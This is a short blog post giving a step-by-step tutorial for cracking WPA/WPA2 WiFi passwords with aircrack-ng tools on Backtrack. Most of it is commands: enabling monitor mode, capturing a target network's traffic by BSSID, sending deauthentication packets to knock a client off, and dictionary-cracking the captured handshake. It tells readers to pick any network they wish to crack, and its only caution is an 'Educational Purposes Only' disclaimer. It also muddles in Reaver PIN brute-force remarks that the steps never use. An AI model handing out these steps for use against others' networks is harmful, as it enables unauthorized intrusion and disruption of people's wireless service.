Header Ads

How to HACK WiFi using Backtrack ( FULL)

 NOTE: This tutorial is for Educational Purposes Only!
What You’ll Need
You do not have to be a expert at Linux or at using a computer. The simple command-line (console ) will do it all. You may need a fair bit of time for this process and maybe also some luck. The brute force may take from 2 hours to more than 10 hours. There are various ways to set up Reaver, but here are the requirements for this guide.
  • Backtrack OS. Backtrack is a bootable Linux distribution with lots of pen-testing tools. You can use various other Linux distribution but I prefer Backtrack. If you don`t know how to install Backtrack then please check this link first.
  • Computer and wireless network card. I cannot guarantee this will work with all the internal wireless card. I recommend a external wireless card.
  • Patience. The process is simple but brute forcing the PIN takes time. So you have to be patient. Kicking the computer won’t help.
  • Here are the basics steps we will be going through:

    Step 1 :-  airmon-ng

    Step 2 :-  airmon-ng wlan0

    Step 3 :- airmon-ng start wlan0


  • Step 4 :-  airodump-ng mon0

     Wait for some time for all the networks to load then press Ctrl+C to stop the updates. Now choose the wireless network that you wish to crack which has “WPA” or “WPA2″ encryption in the “ENC” column, and “PSK” in the “AUTH” column. “OPN” means that the network is open and you can connect to it without a key, WEP will not work here. After selecting the network that you want to crack take note of the BSSID, and the channel (CH) values.

    Step 5 :- airodump-ng –c 6 –bssid 1C:7E:E5:32:1D:54  –w      crack1 mon0


  • Step 6 :- aireplay-ng -0  0 –a 1c:7E:E5:32:1D:54  -c    00:21:5C:50:DE:2D mon0

  • Step 7 :- aircrack-ng –w /pentest/wireless/aircrack-ng/test/password.list  crack1.cap

  • WATCH THE VIDEO

No comments:

Rakib Hossain. Powered by Blogger.